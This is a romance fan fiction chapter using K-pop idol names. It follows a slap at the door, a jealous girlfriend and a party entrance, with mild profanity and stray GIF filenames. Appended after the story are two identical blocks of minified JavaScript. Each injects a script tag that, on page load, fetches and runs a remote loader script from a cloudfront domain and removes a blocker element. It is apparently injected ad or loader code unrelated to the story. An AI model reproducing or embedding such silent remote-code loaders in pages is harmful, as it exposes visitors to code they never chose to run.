Chapter 35

The Will That Changed Their Lives

WARNING: YOU MIGHT KILL SOMEONE AFTER GETTING ON THE MIDDLE PART OF THE CHAPTER

kthxbye

 

 

 

Narrator’s POV

 

Ailee’s eyes widened as soon as she read the news, she immediately got inside her car.

Soomin was the one who opened the door. Ailee narrowed her eyes at her.

“I know how it looks like~”

“Is he home?”

“He’s in his study. Let’s go.”

Soomin was just clad in her usual bikini Ailee shook her head. The two ended up sitting near the pool.

“How did this happen? Everyone’s talking about you.”

“Someone spread the photos~”

“It cant be his girlfriend, right?”

“Lee, Hyoran wouldn’t do that.”

“Think about it, she has all the reasons to do so. Yunho…..I think he’s in love~”

The doorbell rang. Soomin turned his head.

“Wait, I’ll get it.” She patted Ailee’s hand and stood up.

“I’ll get it.” Soomin said to the butler.

 

Your POV

 

I heard Yunho going down from the stairs.

“Soomin-ah? I’ll be by the pool!”  I heard him say.

“We have someone at the door.”

I twisted the knob and found Hyoran looking at me.

“Who is it?” Yunho’s voice was behind me.

Then I felt Hyoran slap me.

“Lee Hyoran!” Yunho pulled me back. I noticed he was topless.

Oh God. She must have misunderstood.

I winced as I felt my cheek.

“What are you doing?!” Yunho’s voice was cold.

“You wouldn’t even answer my calls! And now…you~”

“I was in my office earlier!”

I tried pulling Yunho back but he just shrugged me off. Our family butler stared at me in horror.

“Agasshi, your lip is bleeding.”

Yunho’s gaze snapped back at me.

“Go inside, get that treated.” He said.

“Yunho, it’s fine~”

“I said get inside!”

 

Narrator’s POV

 

Ailee saw it all. She saw her best friend getting slapped by Yunho’s girlfriend and Yunho getting angry because of it.

“He’s in love with you Soo.” She muttered. She went to Soomin and pulled her down to sit on the couch.

“I knew I didn’t like her from the very start.”

“Lee, don’t be like that~”

“What did I tell you?! Don’t be a f.cking martyr, Shim Soomin!”

Soomin stayed quiet as Ailee tried to stop the blood from flowing.

They could both hear Yunho and Hyoran’s heated conversation. Soomin just shook her head.

 

Yunho’s POV

 

I can’t believe what Hyoran did.

“What are you doing?!”

“Why are you two ?”

I sighed.

“Hyo, you do know that Soomin likes to swim every morning. You used to come here.”

Hyoran looked away.

“Are you taking her side?”

“Hyo, I know it’s been hard with the rumors starting, I promise, those rumors will be stopped and they wont know.”

“That’s not the problem here, Yunho.”

“What is?”

“I can’t lose you. I love you.”

I felt a lump form on my throat. Why am I speechless? I don’t know what to say.

“Can I talk to you?” I heard a voice behind us. Ailee stood there with one brow raised.

 

Narrator’s POV

 

Ailee was fuming. Soomin’s left cheek was red. Ailee just did her best to control her anger.

“Hyoran-ah, I think its best if we talk later, we still have an event to go to later.”

Hyoran glared at Ailee. The latter just shrugged.

“I’ll call you later.” Hyoran said brusquely as she went out. Ailee rolled her eyes.

“Is something the matter?” Yunho turned to her.

“Are you sh.tting me?”

Yunho’s eyes widened.

“Soomin got slapped for the first time because of you. She was always the one who was dignified and well respected, and now, some…….girl just standing at the door of HER house slaps her, does it look like nothing’s the matter?”

“Ailee-ssi~”

“I know you’ve helped her many times with her rain phobia, but that’s just nothing to how much she’s sacrificed for you and your girlfriend. So, please, don’t get her hurt again. She’s had enough heart break.” Ailee turned away and walked out. Yunho sat on the couch and pinched the bridge of his nose.

“Jung Yunho, how did your life get so complicated?” He sighed.

 

Ailee went back to Soomin’s room and sat down.

“This is too easy for him.” She muttered.

“What are you blabbering about, Lee?”

“Nothing, are you okay? You still have that party later.”

“I’m fine, you’re coming right?”

“I have to. You’ll kill me.”

“Of course.” Soomin smiled. Ailee shook her head. How could she smile when the third party slapped her?

Ailee was so sure whats going to happen the next time Hyoran hurts Soo, she’ll just have to cut her to pieces or….tell her older cousin.

Ailee left after making sure that Soomin was fine and her cheek didn’t bruise.

 

Soomin plopped on her windowsill seat. She sighed. She was bothered about Hyoran. She understood that the situation earlier was…..untimely and the way the two of them were dressed could lead to misunderstanding but Hyoran shoudnt have assumed right away.

“This is giving me a headache.” She muttered as she kneaded her temples with her fingers. Then, she felt an icepack on her cheek.

“Mianhe.”

She looked at Yunho.

“I understand. Don’t worry, I’m fine.” She replied as she tried to move away, but Yunho pulled her back making her sit on his lap.

“I’ll be the doctor for now, stay still. I don’t want your cheek to bruise.”

Soomin froze.

“Y-Yunho-ya, I’m sure Changmin oppa wont notice~”

“It’s not about that, I just don’t want you to hurt. Changmin can kill me later.”

Soomin closed her eyes in frustration. She wanted to move away from him, but she cant. And she hates herself for it.

“Does it hurt a lot?”

Soomin shook her head.

“Hyoran~”

“Don’t worry, I’m not mad. Just….shocked.”

Yunho nodded and hugged her.

“We should get ready for the party later tonight, we have a lot of acting to do.” Soomin said carefully.

Yunho’s brows furrowed, he didn’t like the word acting.

“I’m really sorry, I didn’t know this would happen.” Yunho said meaningfully.

“I know, but it’s expected.”

“Listen to me, I demand you to stop helping with me Hyoran and my relationship.”

“Yunho, I was~”

“No, I can’t have you hurt again, even your doctor reputation is on the line here.”

 

Your POV

 

Yunho already went ahead to the party. It took me almost an hour to persuade him to go ahead because I suddenly got an emergency call at the hospital. One of my patients needed attention immediately.

I parked my car at our curb and scurried into the house. I saw a blue velvet box on my bed. A note was attached to it; it was in Lee’s hand.

Wear this. Knock them dead, Soo.  –Lee

I opened the box and my jaw dropped.

“Ailee, you’re crazy.”

It was a knee length dress. It was a sleevelss body con dress. Yes, boy conscious, body fit…and this short?! It had black lace cutouts on the belly part.

There was another note at the bottom of the box.

I know what you’re thinking, it’s not ty, babe. This would fit you; I swear Herve Leger loves you. Wear it or I’ll tell Yunho that you missed him when he left. –AILEE<3

I sighed as I headed to the shower. Why is she so sure that I missed him?

Did I even really?

 

Yunho’s POV

 

I was sitting down while chatting with the guys the whole time. Soomin wasn’t still around. Ailee was talking with my friends. Changmin just sat in silence. I know he hates me right now. I just hope he won’t know about what happened earlier, I don’t know how to explain that just yet.

“Yunho.”

Ailee looked up, I turned and found Hyoran looking at me. I saw Junsu put an his hand on Min’s arm.

“I apologize for what happened earlier.”

“Hyo, you shouldn’t be saying that to me.”

“Guys, I think it would be better if you talk somewhere….private. A lot of people are observing you right now. Especially you, Yunho.” Yoochun said.

I could hear the chatter from the crowd inside the hall. Changmin uncrossed his legs and stood up.

“I think the garden would~” Jae got cut off. I noticed that everyone became quiet in the room. Yoochun was looking at the direction of the doors. I heard Ailee grunt.

 

Narrator’s POV

 

Jung Soomin walked inside the hotel’s lobby. Ailee had been texting her non-stop. She was wearing the dress that emphasized her long legs and curves. A lot of people looked at her as she entered. Some men lusted at her beauty. Women grew envious. As soon as she stepped on the red carpet, cameras flashed.

“Agasshi, why are you alone? Is it about the recent scandal?”

Soomin tensed for a while, then she smiled.

“Aniyo, my husband’s schedule and mine always clash. He’s already inside.”

 

She brushed her now; shoulder length hair with her fingers and walked in the place. And, the predictable thing happened, heads turned and mouths closed.

 

“It’s your wife.” Jaejoong said. Yunho turned.

tumblr_m1pcbvBWDd1qd80wyo1_500.gif

His eyes widened. Soomin looked so elegant at the same time y. Ailee saw his reaction. She smirked at Hyoran’s direction. Before Soomin could look for them, she was whisked away by a man in a suit.

“Hmmmm.” Yoochun grinned at Yunho’s direction. Yunho looked away with furrowed brows.

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

tumblr_m2w2spNZ881rs2f2co1_500.gif

forgot to put this up earlier!!


if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};